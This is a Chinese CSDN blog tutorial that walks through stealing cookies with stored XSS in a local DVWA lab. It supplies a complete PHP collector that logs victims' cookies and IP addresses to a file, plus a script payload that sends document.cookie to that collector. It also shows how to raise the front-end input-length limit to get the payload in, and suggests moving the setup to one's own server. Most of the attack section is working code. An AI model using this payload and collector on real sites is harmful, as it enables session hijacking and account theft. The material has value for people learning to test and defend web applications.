存储xss实现获取cookie(本地实战)

本文介绍了如何在PHPStudy环境中利用DVWA靶场进行XSS攻击实战,通过编写xss.php脚本捕获用户输入的cookie信息,并在DVWA的storedxss环节利用payload进行攻击。实战中还提到如何调整payload长度以绕过长度限制,最后强调了本地实战的重要性并祝学习者顺利。
摘要由CSDN通过智能技术生成

实战更能体验收获!!!

环境准备:

1.phpstudy

2.dvwa靶场

实战

首先我们在phpstudy指定的localhost网站目录下编写一个xss.php文件,内容如下:

<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 

然后进入dvwa靶场(security=low),(stored xss)那关,留言写入如下payload。

payload:<script>document.write('<img src="http://127.0.0.1/xss.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');</script>

但是此关卡有长度限制,简单直接前端改一下长度即可:

50改为1000

刷新一下网页

然后到我们写的xss.php文件的目录下,会有一个cookie.txt文件,上面就会记录cookie及其IP

留言

实战结束留言:如果你拥有自己的网站以及服务器,本地实战就在你自己的服务器上实战即可,不过此处的IP地址也要跟着变化,不变化其实也行,但是改了更有实战的感觉,在此祝你们学习顺利!!!

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值